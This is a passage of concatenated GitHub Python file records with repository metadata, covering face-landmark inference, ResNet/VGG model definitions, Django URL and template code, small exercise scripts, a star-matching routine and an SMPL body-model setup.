glob\nfrom faceland import FaceLanndInference\nfrom hdface.hdface import hdface_detector\n \n\n# os.environ['CUDA_VISIBLE_DEVICES'] = '0'\ndef main():\n det = hdface_detector(use_cuda=False)\n checkpoint = torch.load('faceland.pth')\n plfd_backbone = FaceLanndInference().cuda()\n plfd_backbone.load_state_dict(checkpoint)\n plfd_backbone.eval()\n plfd_backbone = plfd_backbone.cuda()\n transform = transforms.Compose([transforms.ToTensor()])\n\n num = 0\n\n for img in os.listdir(\"images\"):\n print(img)\n image = cv2.imread(os.path.join(\"images\",img))\n if image is not None:\n\n height, width = image.shape[:2]\n img_det = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n result = det.detect_face(img_det)\n for i in range(len(result)):\n box = result[i]['box']\n cls = result[i]['cls']\n pts = result[i]['pts']\n x1, y1, x2, y2 = box\n # cv2.rectangle(image, (x1, y1), (x2, y2), (255, 255, 0))\n w = x2 - x1 + 1\n h = y2 - y1 + 1\n\n size_w = int(max([w, h])*0.8)\n size_h = int(max([w, h]) * 0.8)\n cx = x1 + w//2\n cy = y1 + h//2\n x1 = cx - size_w//2\n x2 = x1 + size_w\n y1 = cy - int(size_h * 0.4)\n y2 = y1 + size_h\n\n left = 0\n top = 0\n bottom = 0\n right = 0\n if x1 < 0:\n left = -x1\n if y1 < 0:\n top = -y1\n if x2 >= width:\n right = x2 - width\n if y2 >= height:\n bottom = y2 - height\n\n x1 = max(0, int(x1))\n y1 = max(0, int(y1))\n\n x2 = min(width, int(x2))\n y2 = min(height, int(y2))\n cropped = image[y1:y2, x1:x2]\n# print(top, bottom, left, right)\n cropped = cv2.copyMakeBorder(cropped, top, bottom, left, right, cv2.BORDER_CONSTANT, 0)\n\n cropped = cv2.resize(cropped, (112, 112))\n\n input = cv2.resize(cropped, (112, 112))\n input = cv2.cvtColor(input, cv2.COLOR_BGR2RGB)\n input = transform(input).unsqueeze(0).cuda()\n landmarks = plfd_backbone(input)\n pre_landmark = landmarks[0]\n pre_landmark = pre_landmark.cpu().detach().numpy().reshape(-1, 2) * [size_w, size_h]\n cv2.rectangle(image,(x1, y1), (x2, y2),(0,255,0))\n for (x, y) in pre_landmark.astype(np.int32):\n cv2.circle(image, (x1 - left + x, y1 - bottom + y), 2, (255, 0, 255), 2)\n cv2.imwrite(\"results/\"+img,image)\n\n num +=1\n else:\n break\n\n\n # if cv2.waitKey(0) == 27:\n # break\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"midasklr/facelandmarks","sub_path":"demo_img.py","file_name":"demo_img.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"76"} +{"seq_id":"27725366518","text":"import argparse\nimport numpy 
as np\nimport torch\nimport os\nfrom torch.utils.data import DataLoader\nfrom model import Feedforward, model_a, model_b, model_c, test\nfrom torch.optim import Adam\nfrom torch.utils.data.sampler import Sampler\n\ndef init_args():\n parser = argparse.ArgumentParser(description=None)\n parser.add_argument('-s ', '--save_dir', default='models', help='Path to save the results.')\n parser.add_argument('-m ', '--model', default='model_c', help='Path of the model.')\n parser.add_argument('-l ', '--log_directory', default='./log', help='Path of the log file.')\n parser.add_argument('-a ', '--max_number_of_agents', default=6, type=int, help='Maximum number of agents')\n parser.add_argument('-tb ', '--train_batch_size', default=1024, type=int, help='Batch size')\n parser.add_argument('-vb ', '--validation_batch_size', default=100, type=int, help='Batch size')\n parser.add_argument('-tt ', '--test_batch_size', default=256, type=int, help='Batch size')\n parser.add_argument('-td', '--training_agents', nargs=\"+\", default=[1,2,3,5,6])\n parser.add_argument('-vd', '--validation_agents', nargs=\"+\", default=[1,2,3,5,6])\n parser.add_argument('-tt', '--test_agents', nargs=\"+\", default=[4])\n parser.add_argument('-hd ', '--hidden_dimension', default=32, type=int, help='Hidden dimension size')\n parser.add_argument('-e ', '--embedding_dimension', default=64, type=int, help='Default Embedding dimension')\n parser.add_argument('-ae ', '--action_embedding_dimension', default=64, type=int, help='Action Embedding dimension')\n parser.add_argument('-oe ', '--observation_embedding_dimension', default=64, type=int, help='Observation Embedding dimension')\n parser.add_argument('-se ', '--state_embedding_dimension', default=64, type=int, help='Sstate Embedding dimension')\n parser.add_argument('-t ', '--training_dataset', default='./data/train.npy', help='Path to training dataset')\n parser.add_argument('-te ', '--test_dataset', default='./data/test.npy', help='Path to test dataset')\n parser.add_argument('-v ', '--validation_dataset', default='./data/val.npy', help='Path to validation dataset')\n parser.add_argument('-hl ', '--hidden_layers', default=3, type=int, help='Number of hidden layers in the MLP')\n parser.add_argument('-nh ', '--n_heads', default=1, type=int, help='Number of attention heads')\n parser.add_argument('-th ', '--threshold', default=1e-2, type=int, help='Threshold to stop training')\n\n\n args = parser.parse_args() \n assert args.model in ['test', 'model_a', 'model_b', 'model_c', 'Feedforward'], \"Not a valid model\"\n\n args.model_dir = f'./{args.save_dir}/{args.model}'\n if not os.path.exists(args.model_dir):\n os.mkdir(args.model_dir)\n os.mkdir(f'{args.model_dir}/log')\n \n\n return args\n\n\ndef prepare_dataloader(data, agents, batch_size, args):\n dataloaders = {}\n for n_agent in agents:\n state = data[n_agent]['state']\n action = data[n_agent]['actions']\n target = data[n_agent]['target']\n dataset = Dataset(state, action, target, args)\n dataloaders[n_agent] = DataLoader(dataset, batch_size = batch_size, shuffle=True, drop_last = True)\n return dataloaders\n\n\n\ndef initialize_dataloader(args, subset=None):\n training_data = np.load(args.training_dataset, allow_pickle=True).item()\n validation_data = np.load(args.validation_dataset, allow_pickle=True).item()\n test_data = np.load(args.test_dataset, allow_pickle=True).item()\n\n args.observation_dimension = training_data[1]['state'][0].shape[1]\n args.action_dimension = training_data[1]['actions'][0].shape[1]\n 
args.state_dimension = args.max_number_of_agents * args.observation_dimension\n\n train_dataloaders = prepare_dataloader(training_data, args.training_agents, args.train_batch_size, args)\n val_dataloaders = prepare_dataloader(validation_data, args.validation_agents, args.validation_batch_size, args)\n test_dataloaders = prepare_dataloader(test_data, args.test_agents, args.test_batch_size, args)\n\n\n # Truncate the dataset\n # if subset is not None:\n # state_features = state_features[:subset]\n # action_features = action_features[:subset]\n # targets = targets[:subset]\n\n # Model parametersn\n\n # # Prepare into a torch dataset\n # training_dataset = Dataset(state_features, action_features, targets, args) \n # training_dataloader = DataLoader(training_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True) \n \n # validation_dataset = Dataset(val_state_features, val_action_features, val_targets, args) \n # validation_dataloader = DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, drop_last = True) \n\n # test_dataset = Dataset(test_state_features, test_action_features, test_targets, args) \n # test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True) \n\n return train_dataloaders, val_dataloaders, test_dataloaders, args\n\n\nclass Dataset(torch.utils.data.Dataset):\n \n 'Characterizes a dataset for PyTorch'\n def __init__(self, states, actions, targets, args):\n 'Initialization'\n self.states = states\n self.actions= actions\n self.targets = targets\n self.args = args\n\n def __len__(self):\n 'Denotes the total number of samples'\n return len(self.states)\n\n def __getitem__(self, index):\n 'Generates one sample of data'\n # Select sample\n\n if self.args.model == 'model_a':\n state = np.vstack((self.states[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n action = np.vstack((self.actions[index],np.zeros((self.args.max_number_of_agents, self.args.action_dimension))))[:self.args.max_number_of_agents,:]\n target = np.vstack((self.targets[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n\n # Flatten\n state = state.reshape(1,-1)\n target = target.reshape(1,-1)\n\n elif self.args.model == 'Feedforward':\n state = np.vstack((self.states[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n action = np.vstack((self.actions[index],np.zeros((self.args.max_number_of_agents, self.args.action_dimension))))[:self.args.max_number_of_agents,:]\n target = np.vstack((self.targets[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n \n elif self.args.model == 'model_b':\n state = self.states[index]\n action = self.actions[index]\n target = self.targets[index]\n \n elif self.args.model == 'model_c':\n state = self.states[index]\n action = self.actions[index]\n target = self.targets[index]\n\n state = state[0].reshape(1,-1)\n target = target[0].reshape(1,-1)\n \n else:\n state, action, target = None, None, None\n\n return state, action, target\n\n\ndef initialize_model(args):\n model_path = f'{args.model_dir}/model.pth'\n if os.path.exists(model_path):\n f = open(f'{args.model_dir}/log/log.txt', 'w')\n f.write(\"Loading Model.\\n\")\n f.close()\n print(f\"Loading model from {model_path}\")\n model = torch.load(f'{model_path}')\n elif args.model == 
'Feedforward':\n model = Feedforward(args)\n elif args.model == 'model_a':\n model = model_a(args)\n elif args.model == 'model_b':\n model = model_b(args)\n elif args.model =='model_c':\n model = model_c(args)\n elif args.model == 'test':\n model = test(args)\n else:\n model = None\n assert(False, \"Invalid Entry\")\n \n criterion = torch.nn.L1Loss()\n optimizer = Adam(model.parameters())\n\n return model, criterion, optimizer\n\n\ndef evaluate(model, dataloaders, criterion):\n total_loss = 0\n model.eval()\n n_batches = 0.0\n with torch.no_grad():\n for dataloader in dataloaders.values():\n for observations, actions, target in dataloader:\n prediction = model.forward(observations, actions)\n\n prediction = torch.Tensor(prediction.flatten())\n target = torch.Tensor(target.flatten().float())\n loss = criterion(prediction, target)\n\n total_loss += loss.item()\n n_batches += 1.0\n model.train()\n total_loss = total_loss/ n_batches\n return total_loss\n\n\ndef log(epoch, args, validation_loss=None, training_loss=None, test_loss = None):\n\n if test_loss is not None:\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f'Test loss: {test_loss}')\n print(f'Test loss: {test_loss}')\n f.close()\n else:\n # Save to log and print to output\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f'iteration {epoch}s Training loss: {training_loss}, validation loss: {validation_loss}\\n')\n print(f'iteration {epoch}s Training loss: {training_loss}, validation loss: {validation_loss}\\n')\n f.close()\n\n\ndef save_model(model, args, epoch):\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f\"Saving model on iteration {epoch}\\n\")\n print(f\"Saving model on iteration {epoch}\\n\")\n torch.save(model, f\"{args.model_dir}/model.pth\")\n f.close()","repo_name":"yubryanj/Ad-hoc-MARL","sub_path":"attention_model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71959620727","text":"from django import template\nfrom django.urls import reverse\n\nfrom taskmaster.base.utils.navigationBar import linkItem, Icon\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef navigationPanel(request):\n links = [\n linkItem('Home', '', None),\n ]\n\n if request.user.is_authenticated:\n links.append(\n linkItem('Account', '', None, [\n linkItem('Dashboard', reverse('jira:dashboard-view'), Icon('', 'fas fa-chalkboard', '15')),\n linkItem('Teams', reverse('jira:teams-page'), Icon('', 'fa fa-users', '15')),\n linkItem('Projects', reverse('jira:projects-page'), Icon('', 'fas fa-project-diagram', '15')),\n linkItem('Boards', reverse('jira:boards-page'), Icon('', 'far', '15')),\n linkItem('Settings', f\"{reverse('accounts:account-settings')}?tab=profileAndVisibility\", Icon('', 'fa', '15')),\n None,\n linkItem('Logout', reverse('accounts:logout'), Icon('', 'fas fa-sign-out-alt', '15')),\n ]),\n )\n else:\n links.append(\n linkItem('Login / Register', '', None, [\n linkItem('Register', reverse('accounts:register'), Icon('', 'fas fa-user-circle', '20')),\n None,\n linkItem('Login', reverse('accounts:login'), Icon('', 'fas fa-sign-in-alt', '20')),\n ]),\n )\n return links\n","repo_name":"hajam09/taskmaster","sub_path":"accounts/templatetags/templateTags.py","file_name":"templateTags.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26742830638","text":"\"\"\"this is 
text\"\"\"\ndef triangle():\n \"\"\"this is text\"\"\"\n num1, num2 = int(input()) ** 2, int(input()) ** 2\n num3 = (num1 + num2) ** (1/2)\n if num3 == int(num3):\n print(int(num3))\n else:\n print(\"%.4f\" %num3)\ntriangle()","repo_name":"sagelga/psit-python3","sub_path":"Leisure Problems/LEI_1827Triangle.py","file_name":"LEI_1827Triangle.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34775735545","text":"from django.conf.urls import url\nfrom . import views\nfrom . import ajax\n\n# We are adding a URL called /home\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^personas/$', views.indexPersonas, name='personas'),\n url(r'^newPersona/$', views.new_persona, name='newPersona'),\n url(r'^detailPersona/(?P\\d+)/$', views.detailPersona, name='detailPersona'),\n url(r'^deletePersona/(?P\\d+)/$', views.deletePersona, name='deletePersona'),\n]","repo_name":"biocar2001/python-django-temporales-website","sub_path":"temporales/personas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41309309833","text":"import cv2\nimport numpy as np\nimport blur_face_params as bf\n\nimage = bf.image\ncv2.imshow(\"image\", image)\ncv2.waitKey(0)\nprint(image.shape[1])\nprint(image.shape[0])\nmask = np.zeros(image.shape[:2], dtype=np.uint8)\n#print(mask.shape)\ncv2.rectangle(mask,bf.rect_start_pix, bf.rect_end_pix, (256,256,256), -1)\ncv2.imshow(\"mask- extract face\", mask)\ncv2.waitKey(0)\noutputImage = cv2.bitwise_and(image, image, mask=mask)\ncv2.imshow(\"outputImage\", outputImage)\ncv2.waitKey(0)","repo_name":"swethabommisetti/PracticeCode","sub_path":"Masking/MaskingwithBitwiseOperators.py","file_name":"MaskingwithBitwiseOperators.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7094648239","text":"import torchvision\nimport torch\nimport torch.nn as nn\n\nclass ResNet(torchvision.models.ResNet):\n \"\"\"ResNet generalization for CIFAR-like thingies.\n\n This is a minor modification of\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py,\n adding additional options.\n \"\"\"\n\n def __init__(self, block, layers, num_classes=2, zero_init_residual=False,\n groups=1, base_width=64, replace_stride_with_dilation=[False, False, False, False],\n norm_layer=torch.nn.BatchNorm2d, strides=[1, 2, 2, 2], initial_conv=[3, 1, 1]):\n \"\"\"Initialize as usual. Layers and strides are scriptable.\"\"\"\n super(torchvision.models.ResNet, self).__init__() # torch.nn.Module\n self._norm_layer = norm_layer\n\n self.dilation = 1\n if len(replace_stride_with_dilation) != 4:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 4-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n\n self.inplanes = base_width\n self.base_width = 64 # Do this to circumvent BasicBlock errors. 
The value is not actually used.\n self.conv1 = torch.nn.Conv2d(3, self.inplanes, kernel_size=initial_conv[0],\n stride=initial_conv[1], padding=initial_conv[2], bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = torch.nn.ReLU(inplace=True)\n\n layer_list = []\n width = self.inplanes\n for idx, layer in enumerate(layers):\n layer_list.append(self._make_layer(block, width, layer, stride=strides[idx], dilate=replace_stride_with_dilation[idx]))\n width *= 2\n self.layers = torch.nn.Sequential(*layer_list)\n\n self.avgpool = torch.nn.AdaptiveAvgPool2d((1, 1))\n self.fc = torch.nn.Linear(width // 2 * block.expansion, num_classes)\n #self.predict = nn.Sigmoid()\n\n for m in self.modules():\n if isinstance(m, torch.nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (torch.nn.BatchNorm2d, torch.nn.GroupNorm)):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the arch by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n\n\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n\n x = self.layers(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x) # Sigmoid\n #x = self.predict(x)\n return x\n\nclass VGG(nn.Module):\n\n\n def __init__(self, features, output_dim):\n super().__init__()\n\n self.features = features\n\n self.avgpool = nn.AdaptiveAvgPool2d(7)\n\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(4096, output_dim),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = self.avgpool(x)\n h = x.view(x.shape[0], -1)\n x = self.classifier(h)\n return x\n\ndef get_vgg_layers(config, batch_norm):\n\n layers = []\n in_channels = 3\n\n for c in config:\n assert c == 'M' or isinstance(c, int)\n if c == 'M':\n layers += [nn.MaxPool2d(kernel_size=2)]\n else:\n conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(c), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = c\n\n return nn.Sequential(*layers)\n\nvgg11_config = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']\nvgg16_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']\n\ndef get_model(args, setup=dict(device=torch.device('cpu'), dtype=torch.float)):\n\n model_name = args.model_name[0]\n\n print(model_name)\n in_channels = 3\n initial_conv = [3, 1, 1]\n NUM_CLASSES = 10 if args.dataset != 'CIFAR-Binary' else 1\n\n # Initialize model \n if model_name == 'ResNet18':\n model = ResNet(torchvision.models.resnet.BasicBlock, [2, 2, 2, 2], num_classes=NUM_CLASSES, base_width=64, initial_conv=initial_conv)\n else:\n #elif model_name == 'VGG16':\n vgg_layers = get_vgg_layers(vgg16_config, batch_norm=True)\n model = VGG(vgg_layers, output_dim=NUM_CLASSES)\n #elif model_name == 'MLP':\n # model = MLP()\n\n model.train()\n\n return model\n\n\n","repo_name":"Jimmy-di/camouflage-poisoning","sub_path":"tools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} 
+{"seq_id":"2888776889","text":"from django.test import TestCase\n\nfrom base.models import Task\nfrom base.paginators import TaskPaginator\n\n\nclass PaginatorTest(TestCase):\n fixtures = [\"user.json\", \"base.json\"]\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.object_list = Task.objects.all()\n cls.task_paginator = TaskPaginator(cls.object_list, per_page=1)\n\n def test_get_paginated_context(self):\n db_page_limit = PaginatorTest.object_list.count()\n db_page = PaginatorTest.object_list[:1]\n (\n page_limit,\n page_number,\n page,\n ) = PaginatorTest.task_paginator.get_paginated_context(1)\n\n self.assertEqual(page_limit, db_page_limit)\n self.assertEqual(page_number, 1)\n for task, task_db in zip(page, db_page):\n self.assertEqual(task, task_db)\n","repo_name":"G0udini/todoapp","sub_path":"base/tests/test_paginators.py","file_name":"test_paginators.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6465271702","text":"def calc(n):\n n = ((n / total) * 100)\n return n\n\n\njogadores = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ntotal = 0\n\nprint('Enquete: Quem foi o melhor jogador?')\nvoto = int(input('Número do jogador (0=fim): '))\n\nwhile voto != 0:\n if 1 <= voto <= 23:\n jogadores[voto - 1] += 1\n total += 1\n else:\n print('Informe um valor entre 1 e 23 ou 0 para sair!')\n voto = int(input('Número do jogador (0=fim): '))\n\nmelhor = 0\n# maior = jogadores.max()\nfor v in jogadores:\n if v > melhor:\n melhor = v\nposi = jogadores.index(melhor) + 1\n\nprint('Resultado da votação:')\nprint('Foram computados', total, 'votos.')\nprint('\\nJogador votos % ')\nfor i in range(23):\n if jogadores[i] > 0:\n print(i + 1, ' ', jogadores[i], ' ', round(calc(jogadores[i]), 2), '%')\n\nprint('O melhor jogador foi o número {} com {} votos, correspondendo a {}% do total de votos'.format(posi, melhor, round(calc(melhor), 2)))\n","repo_name":"rheneaaa/meustrabalhos-python-html-css","sub_path":"exercícios-cisco-python/avaliação01.py","file_name":"avaliação01.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1446178172","text":"import numpy as np\n\nfrom vstarstack.library.stars import describe\n\nclass DescriptorMatcher:\n \"\"\"Match star descriptors\"\"\"\n def __init__(self,\n min_matched_items : int,\n max_angle_diff : float,\n max_vertex_angle_diff : float,\n max_relative_size_diff : float):\n self.min_matched_items = min_matched_items\n self.max_angle_diff = max_angle_diff\n self.max_vertex_angle_diff = max_vertex_angle_diff\n self.max_relative_size_diff = max_relative_size_diff\n\n def _build_match_table(self,\n items1 : list[describe.DescriptorItem],\n items2 : list[describe.DescriptorItem]):\n match_table = {}\n for i, item1 in enumerate(items1):\n match_table[i] = {}\n for j, item2 in enumerate(items2):\n match = item1.compare(item2,\n max_distance_angle_diff=self.max_angle_diff,\n max_vertex_angle_diff=self.max_vertex_angle_diff,\n max_relative_size_diff=self.max_relative_size_diff)\n if match is not np.inf:\n match_table[i][j] = match\n return match_table\n\n def _get_matched_items(self, items1, items2):\n used_second = []\n matches = {}\n match_table = self._build_match_table(items1, items2)\n for i,match in match_table.items():\n if len(match) == 0:\n continue\n minimal = np.inf\n index = None\n for j,match_item in 
match.items():\n if match_item < minimal and j not in used_second:\n minimal = match_item\n index = j\n if index is not None:\n matches[i] = index\n used_second.append(index)\n return matches\n\n def check_match(self, desc1 : describe.Descriptor, desc2 : describe.Descriptor):\n \"\"\"Compare 2 descriptors\"\"\"\n matches = self._get_matched_items(desc1.items, desc2.items)\n minreq = min([self.min_matched_items, len(desc1.items), len(desc2.items)])\n return len(matches) >= minreq\n\n def build_match(self,\n descs1 : list[describe.Descriptor],\n descs2 : list[describe.Descriptor]) -> dict:\n \"\"\"Find matches between 2 images\"\"\"\n matches = {}\n used_second = []\n for i, desc1 in enumerate(descs1):\n for j, desc2 in enumerate(descs2):\n if j in used_second:\n continue\n if self.check_match(desc1, desc2):\n matches[i] = j\n used_second.append(j)\n break\n return matches\n\ndef select_matching_images(first_item : int, num_of_descs : int, max_compares : int):\n if max_compares == 0 or num_of_descs <= max_compares:\n return range(num_of_descs)\n indexes = []\n for index in range(max_compares):\n indexes.append((index + first_item + 1) % num_of_descs)\n return indexes\n\ndef build_stars_match_table(matcher : DescriptorMatcher,\n descs : list[list[describe.Descriptor]],\n max_compares : int):\n \"\"\"\n Find stars matches between all images\n\n Arguments:\n * matcher - descriptor matcher\n * descs - list of list of descriptors\n * max_compares - maximal amount of compares. unlimited if 0\n\n Function create stars match table\n \"\"\"\n\n matches = {}\n for i, stars1 in enumerate(descs):\n matches[i] = {}\n indexes = select_matching_images(i, len(descs), max_compares)\n for j in indexes:\n if i == j:\n continue\n stars2 = descs[j]\n matches[i][j] = matcher.build_match(stars1, stars2)\n\n return matches\n","repo_name":"vladtcvs/VStarsStack","sub_path":"src/vstarstack/library/stars/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"28139446362","text":"'''\n @FileName : init.py\n @EditTime : 2021-09-19 21:48:33\n @Author : Buzhen Huang\n @Email : hbz@seu.edu.cn\n @Description :\n'''\n\nimport os\nimport os.path as osp\nimport yaml\nimport torch\nimport sys\nimport numpy as np\nfrom utils.data_parser import create_dataset\nfrom utils.utils import JointMapper, load_camera_para, get_rot_trans\nimport smplx\nfrom camera import create_camera\nfrom prior import create_prior\nfrom utils.prior import load_vposer\n\n\ndef init(**kwarg):\n\n setting = {}\n # create folder\n output_folder = kwarg.pop('output_folder')\n output_folder = osp.expandvars(output_folder)\n if not osp.exists(output_folder):\n os.makedirs(output_folder)\n\n # Store the arguments for the current experiment\n conf_fn = osp.join(output_folder, 'conf.yaml')\n with open(conf_fn, 'w') as conf_file:\n yaml.dump(kwarg, conf_file)\n\n result_folder = kwarg.pop('result_folder', 'results')\n result_folder = osp.join(output_folder, result_folder)\n if not osp.exists(result_folder):\n os.makedirs(result_folder)\n\n mesh_folder = kwarg.pop('mesh_folder', 'meshes')\n mesh_folder = osp.join(output_folder, mesh_folder)\n if not osp.exists(mesh_folder):\n os.makedirs(mesh_folder)\n\n out_img_folder = osp.join(output_folder, 'images')\n if not osp.exists(out_img_folder):\n os.makedirs(out_img_folder)\n\n # assert cuda is available\n use_cuda = kwarg.get('use_cuda', True)\n if use_cuda and not 
torch.cuda.is_available():\n print('CUDA is not available, exiting!')\n sys.exit(-1)\n\n # read gender\n input_gender = kwarg.pop('gender', 'neutral')\n model_type = kwarg.get('model_type')\n if model_type == 'smpllsp':\n assert(input_gender == 'neutral'), 'smpl-lsp model support neutral only'\n\n if model_type == 'smpllsp':\n # the hip joint of smpl is different with 2D annotation predicted by openpose/alphapose, so we use smpl-lsp model to replace\n pose_format = 'lsp14'\n elif model_type == 'smplx':\n pose_format = 'coco25'\n else:\n pose_format = 'coco17' # ! 使用COCO17\n\n global dataset_obj\n dataset_obj = create_dataset(pose_format=pose_format, **kwarg)\n\n float_dtype = kwarg.get('float_dtype', 'float32')\n if float_dtype == 'float64':\n dtype = torch.float64\n elif float_dtype == 'float32':\n dtype = torch.float32\n else:\n raise ValueError('Unknown float type {}, exiting!'.format(float_dtype))\n\n # map smpl joints to 2D keypoints\n joint_mapper = JointMapper(dataset_obj.get_model2data())\n\n model_params = dict(model_path=kwarg.get('model_folder'),\n joint_mapper=joint_mapper,\n create_global_orient=True,\n create_body_pose=not kwarg.get('use_vposer'),\n create_betas=True,\n create_left_hand_pose=False,\n create_right_hand_pose=False,\n create_expression=False,\n create_jaw_pose=False,\n create_leye_pose=False,\n create_reye_pose=False,\n create_transl=True, # set transl in multi-view task --Buzhen Huang 07/31/2019\n create_scale=True,\n dtype=dtype,\n **kwarg)\n\n model = smplx.create_scale(gender=input_gender, **model_params)\n\n # load camera parameters\n cam_params = kwarg.pop('cam_param')\n extris, intris = load_camera_para(cam_params)\n trans, rot = get_rot_trans(extris, photoscan=False)\n\n # Create the camera object\n # create camera\n views = len(extris)\n camera = []\n for v in range(views):\n focal_length = float(intris[v][0][0])\n rotate = torch.tensor(rot[v], dtype=dtype).unsqueeze(0)\n translation = torch.tensor(trans[v], dtype=dtype).unsqueeze(0)\n center = torch.tensor(intris[v][:2, 2], dtype=dtype).unsqueeze(0)\n camera_t = create_camera(focal_length_x=focal_length,\n focal_length_y=focal_length,\n translation=translation,\n rotation=rotate,\n center=center,\n dtype=dtype,\n **kwarg)\n camera.append(camera_t)\n\n # fix rotation and translation of camera\n for cam in camera:\n if hasattr(cam, 'rotation'):\n cam.rotation.requires_grad = False\n if hasattr(cam, 'translation'):\n cam.translation.requires_grad = False\n\n # create prior\n body_pose_prior = create_prior(\n prior_type=kwarg.get('body_prior_type'),\n dtype=dtype,\n **kwarg)\n shape_prior = create_prior(\n prior_type=kwarg.get('shape_prior_type', 'l2'),\n dtype=dtype, **kwarg)\n angle_prior = create_prior(prior_type='angle', dtype=dtype)\n\n if use_cuda and torch.cuda.is_available():\n device = torch.device('cuda')\n\n for cam in camera:\n cam = cam.to(device=device)\n model = model.to(device=device)\n body_pose_prior = body_pose_prior.to(device=device)\n angle_prior = angle_prior.to(device=device)\n shape_prior = shape_prior.to(device=device)\n else:\n device = torch.device('cpu')\n\n # A weight for every joint of the model\n joint_weights = dataset_obj.get_joint_weights().to(device=device,\n dtype=dtype)\n # Add a fake batch dimension for broadcasting\n joint_weights.unsqueeze_(dim=0)\n\n # load vposer\n vposer = None\n pose_embedding = None\n batch_size = 1\n if kwarg.get('use_vposer'):\n vposer_ckpt = osp.expandvars(kwarg.get('prior_folder'))\n vposer = load_vposer(vposer_ckpt, vp_model='snapshot')\n 
vposer = vposer.to(device=device)\n vposer.eval()\n pose_embedding = torch.zeros([batch_size, 32],\n dtype=dtype, device=device,\n requires_grad=True)\n\n # process fixed parameters\n setting['fix_scale'] = kwarg.get('fix_scale')\n if kwarg.get('fix_scale'):\n setting['fixed_scale'] = np.array(kwarg.get('scale'))\n else:\n setting['fixed_scale'] = None\n if kwarg.get('fix_shape'):\n setting['fixed_shape'] = np.array(kwarg.get('shape'))\n else:\n setting['fixed_shape'] = None\n\n # return setting\n setting['use_3d'] = kwarg.pop(\"use_3d\")\n setting['extrinsics'] = extris\n setting['intrinsics'] = intris\n setting['model'] = model\n setting['dtype'] = dtype\n setting['device'] = device\n setting['vposer'] = vposer\n setting['joints_weight'] = joint_weights\n setting['body_pose_prior'] = body_pose_prior\n setting['shape_prior'] = shape_prior\n setting['angle_prior'] = angle_prior\n setting['cameras'] = camera\n setting['img_folder'] = out_img_folder\n setting['result_folder'] = result_folder\n setting['mesh_folder'] = mesh_folder\n setting['pose_embedding'] = pose_embedding\n setting['batch_size'] = batch_size\n setting['adjustment'] = kwarg.pop(\"adjustment\")\n setting['use_vposer'] = kwarg.pop(\"use_vposer\")\n return dataset_obj, 